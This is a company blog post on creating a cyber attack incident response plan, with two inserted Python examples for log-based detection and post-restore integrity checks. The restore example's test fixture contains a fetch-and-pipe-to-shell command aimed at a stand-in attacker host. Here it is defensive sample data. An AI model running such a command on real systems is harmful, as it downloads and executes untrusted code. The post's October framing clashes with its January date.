5 steps to creating an effective cyber attack incident response plan

Author: Laurence Glen  |  Date published: 10 January 2023, UK  |  Read est: 4 min read

Focus Group

October is Cyber Security Awareness Month, and as part of our commitment to keeping your business safe from hackers, we are sharing a comprehensive guide on how to prevent and respond to cyber attacks swiftly and safely.

A cyber security breach can have far-reaching consequences, including significant costs, operational disruptions, and damage to your organisation's reputation. To mitigate these risks, it's crucial to have a well-prepared cyber attack response plan in place. In this article, we will delve into the five key steps to creating an effective incident response plan: prevention, practice, detection, containment, and post-incident actions. By the end of this guide, you will have a clear understanding of how to prevent a cyber attack and respond to one effectively.

1. Prevention

Training your Staff:

Cyber security training is the foundation of prevention. Educate your employees about current cyber threats, common attack vectors such as phishing, the importance of adhering to security policies, and how to report a suspected incident quickly. Training should be ongoing, not a one-off induction, so that staff stay vigilant and informed.

Invest in the Right Security:

Invest in robust security infrastructure, including firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and endpoint protection. Patch promptly, and remember that this applies to the security tooling itself as well as to the servers, workstations and network devices it protects: an unpatched firewall or VPN appliance is a common way in.

Security Monitoring:

Consider outsourcing security monitoring to a dedicated cybersecurity company. They can provide 24/7 monitoring, threat detection, and rapid response, reducing the burden on your internal IT team.

Access Controls:

Regularly review access controls and permissions, and remove accounts and rights that are no longer needed. Enforce multi-factor authentication (MFA), particularly on remote access and on administrative accounts. Limit admin privileges to as few accounts as possible, use them only for administrative tasks, and replace default passwords with strong, unique ones. Reduce the number of internet-facing services and remote-access paths so there is less to monitor and defend.

Departmental Involvement:

Identify which departments should be involved in your cyber attack response plan. Senior management, IT, legal, customer service, and marketing all play crucial roles in responding to and recovering from an attack.

Communication Plan:

Establish alternative, out-of-band communication channels, such as a secure messaging app or phone bridge, that do not depend on the systems or identity provider under attack. If corporate email or the primary chat platform is compromised, the response team must still be able to coordinate without tipping off the attacker.

2. Practice

Send Fake Phishing Attacks:

Conduct regular phishing exercises to assess your employees' ability to recognise and report phishing attempts. Measure the report rate as well as the click rate: a workforce that reports quickly gives the security team time to act before a single click becomes a breach.

Run Simulations:

Practice incident response through simulations. Create scenarios that mimic real-world cyber threats and test the effectiveness of your response plan. Ensure key team members know their roles and responsibilities during a crisis.

Stay Informed:

Keep your teams updated about emerging cyber threats and scams. Regularly provide training and awareness sessions to ensure that everyone is well-informed about the evolving threat landscape. Encourage reporting of suspicious activity.

3. Detection

Prioritise Assets:

Identify and classify your organisation's highest-priority assets. Knowing what needs protection allows you to allocate resources and implement tailored security measures effectively. This also helps assess the potential impact of an attack.

Network Visibility:

Achieve comprehensive visibility into your network. Understand adversary tactics, techniques, and procedures (TTPs), likely entry points, and the places attackers establish persistence. Retain historical logs and telemetry, not only data backups, so that past incidents and trends can be analysed and turned into threat intelligence.

Incident Response Tools:

Implement advanced incident response tools like Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR). These tools enable proactive threat hunting, allowing you to detect indicators of compromise and assess the scope of an attack more effectively.
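The detection step above is easier to reason about with concrete rules run over concrete telemetry. The following is an added illustration, not code from the original article or from Focus Group: it parses a small constructed set of endpoint events (logons, DNS queries, scheduled-task creation) and applies four rules that correspond to the text, a burst of failed logons followed by a success, a known-compromised account appearing on a second host (scope assessment), a DNS query for a command-and-control domain, and persistence pointing at a user-writable path. The log format, the C2 domain `update-cdn.example.net`, the directory list and the thresholds are all hypothetical assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs), one event per line:
#   <ISO timestamp> host=<name> type=<event> key=value ...
SAMPLE_EVENTS = """\
2023-01-10T08:01:10 host=ws-042 type=logon user=alice src=10.1.4.20 result=fail
2023-01-10T08:01:12 host=ws-042 type=logon user=alice src=10.1.4.20 result=fail
2023-01-10T08:01:14 host=ws-042 type=logon user=alice src=10.1.4.20 result=fail
2023-01-10T08:01:15 host=ws-042 type=logon user=alice src=10.1.4.20 result=fail
2023-01-10T08:01:17 host=ws-042 type=logon user=alice src=10.1.4.20 result=fail
2023-01-10T08:01:19 host=ws-042 type=logon user=alice src=10.1.4.20 result=success
2023-01-10T08:03:40 host=ws-042 type=dns query=update-cdn.example.net
2023-01-10T08:04:02 host=ws-042 type=schtask name=WinUpdateSvc image=C:\\Users\\Public\\svc.exe
2023-01-10T08:05:30 host=srv-db01 type=logon user=alice src=10.1.4.42 result=success
2023-01-10T09:15:00 host=ws-017 type=dns query=www.example.com
2023-01-10T09:16:00 host=ws-017 type=logon user=bob src=10.1.4.31 result=fail
2023-01-10T09:16:30 host=ws-017 type=logon user=bob src=10.1.4.31 result=success
"""

# Hypothetical indicators of compromise, as a threat-intel feed would supply them.
C2_DOMAINS = {"update-cdn.example.net"}
# Persistence whose binary lives in a user-writable location is a classic red flag
# (hypothetical list for the example).
SUSPICIOUS_IMAGE_DIRS = ("C:\\Users\\Public\\", "C:\\ProgramData\\Temp\\")


def parse_event(line):
    """Parse one telemetry line into a dict; 'ts' becomes a datetime."""
    line = line.strip()
    if not line:
        return None
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def parse_events(text):
    return [e for e in (parse_event(l) for l in text.splitlines()) if e]


def detect(events, fail_threshold=5, window=timedelta(minutes=2)):
    """Run the detection rules over time-ordered events.
    Returns findings as (rule, host, detail) tuples."""
    findings = []
    fails = defaultdict(list)   # (host, user, src) -> timestamps of recent failures
    compromised = {}            # user -> host where the brute force succeeded
    for e in sorted(events, key=lambda x: x["ts"]):
        kind = e.get("type")
        if kind == "logon":
            key = (e["host"], e["user"], e["src"])
            recent = [t for t in fails[key] if e["ts"] - t <= window]
            if e["result"] == "fail":
                fails[key] = recent + [e["ts"]]
            elif len(recent) >= fail_threshold:
                # Rule 1: burst of failures then a success = password guessing that worked
                findings.append(("brute_force_success", e["host"], e["user"]))
                compromised[e["user"]] = e["host"]
                fails[key] = []
            elif compromised.get(e["user"], e["host"]) != e["host"]:
                # Rule 2: a known-compromised account now logging on elsewhere (scope)
                findings.append(("lateral_movement", e["host"], e["user"]))
        elif kind == "dns" and e.get("query") in C2_DOMAINS:
            # Rule 3: name resolution for a known command-and-control domain
            findings.append(("c2_dns", e["host"], e["query"]))
        elif kind == "schtask" and e.get("image", "").startswith(SUSPICIOUS_IMAGE_DIRS):
            # Rule 4: scheduled-task persistence pointing at a user-writable path
            findings.append(("suspicious_schtask", e["host"], e["image"]))
    return findings


def scope(findings):
    """Summarise affected hosts and accounts so containment can target them."""
    return {
        "hosts": sorted({host for _, host, _ in findings}),
        "accounts": sorted({d for rule, _, d in findings
                            if rule in ("brute_force_success", "lateral_movement")}),
    }


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f)
    print(scope(found))
```

Run as-is it flags the brute-forced account on ws-042, the C2 lookup, the scheduled task under C:\Users\Public, and alice's subsequent logon to srv-db01, and `scope()` returns the two hosts and one account that the containment step should act on first. The rules are deliberately simple; the point is that each one is written down, testable against sample data, and produces output the response team can act on.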

4. Containment

Remedial Actions:

In the event of an attack, your IT and security teams should be equipped to take immediate remedial actions: isolating affected hosts from the network, blocking malicious files, processes, and programs, and disabling compromised accounts and resetting their credentials to prevent further damage. Preserve logs and, where practical, disk and memory images of affected hosts before they are wiped, so that the later investigation has evidence to work from.

Cut Off Access:

To contain an attack, block command and control (C2) traffic and known malicious domains at the firewall, web proxy or DNS layer. Remove adversary artefacts and tools from compromised systems. Close the entry points the attacker used and remove every persistence mechanism found (scheduled tasks, services, rogue accounts, web shells). Adjust configurations to enhance security, including threat policies and endpoint security settings, so the same route cannot be reused.

Restore Assets:

Ensure a comprehensive recovery process. Restore impacted assets from offline backups taken before the compromise, so that the restore does not simply bring the attacker's tools back. Confirm the integrity of restored systems before bringing them back online, for example by comparing file hashes against the known-good backup and checking that no unexpected files or persistence remain.
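"Confirm the integrity of restored systems" is easy to say and easy to skip. As an added example, not code from the original article or from Focus Group, the following builds a SHA-256 manifest from a known-good backup tree and then checks a restored tree against it, reporting files whose contents changed, files the restore failed to bring back, and files present on the restored host that the backup never contained (the typical sign of an implant or web shell that survived). The directory layout, file contents and the `c2.example` URL are constructed for the demonstration and written to temporary directories so the script runs anywhere.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 16):
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, POSIX separators) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(root, manifest):
    """Compare a restored tree against the manifest taken from the known-good backup.
    Returns the lists a responder needs: modified, missing and unexpected files,
    plus a 'clean' flag that is True only when all three lists are empty."""
    restored = build_manifest(root)
    modified = sorted(p for p in manifest if p in restored and restored[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in restored)
    unexpected = sorted(p for p in restored if p not in manifest)
    return {"modified": modified, "missing": missing, "unexpected": unexpected,
            "clean": not (modified or missing or unexpected)}


def _write(root, rel, data):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_bytes(data)


def demo():
    """Constructed scenario (hypothetical files): a restore that is not clean.
    The binary came back intact, the config was tampered with, one library is
    missing, and an attacker's script under a hidden cache directory survived."""
    with tempfile.TemporaryDirectory() as backup, tempfile.TemporaryDirectory() as restored:
        # Known-good offline backup taken before the compromise
        _write(backup, "app/bin/service", b"ELF...original binary")
        _write(backup, "app/config.ini", b"[db]\nhost=db01\n")
        _write(backup, "app/lib/helper.so", b"ELF...helper library")
        # State of the host after the restore
        _write(restored, "app/bin/service", b"ELF...original binary")
        _write(restored, "app/config.ini", b"[db]\nhost=db01\nuser=backdoor\n")
        _write(restored, "app/.cache/update.sh", b"curl http://c2.example/x | sh\n")
        manifest = build_manifest(backup)
        return verify_restore(restored, manifest)


if __name__ == "__main__":
    print(demo())
```

The manifest should be generated from the offline backup media itself, not from the host being rebuilt, and stored somewhere the attacker cannot reach; a manifest computed after the restore would merely certify whatever is already there.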

5. Post-Incident

Resolution Assurance:

Conduct a thorough post-incident review to confirm that every issue has been fully resolved: the initial entry point is closed, all persistence mechanisms identified during containment are gone, and compromised credentials have been rotated. Leave no room for hidden problems that the same attacker could exploit to return.

Communication:

After an incident, communicate openly with employees and customers. Transparency is key to maintaining trust. Provide clear information about the incident, the actions taken to mitigate it, and any potential impact on data or services, and meet any regulatory notification deadlines that apply, such as reporting a notifiable personal data breach to the ICO within 72 hours under UK GDPR.

Continuous Improvement:

Continuously analyse and assess your cyber attack response plan. Identify weak points and areas for improvement. Consider partnering with a Managed Detection and Response (MDR) provider to enhance your ongoing security posture and readiness against cyber threats. Regularly update your plan to adapt to evolving threats and technologies.

By diligently following these steps, companies can build a robust cyber attack response plan that not only helps prevent attacks but also ensures a swift and effective response if an incident occurs. Cybersecurity is an ever-evolving field, and proactive measures are essential to protect against emerging threats.


Laurence Glen
IT Director

Our IT world, together with the ongoing development of this business-critical portfolio of services, is in very capable hands with Laurence at the helm. IBM-trained and with a 22-year track record of proven success in the IT sector, Laurence is perfectly placed to lead the overall IT strategy for Focus Group, ensuring we're at the forefront of product development and service innovations in order to deliver the best possible IT technologies for our customers.
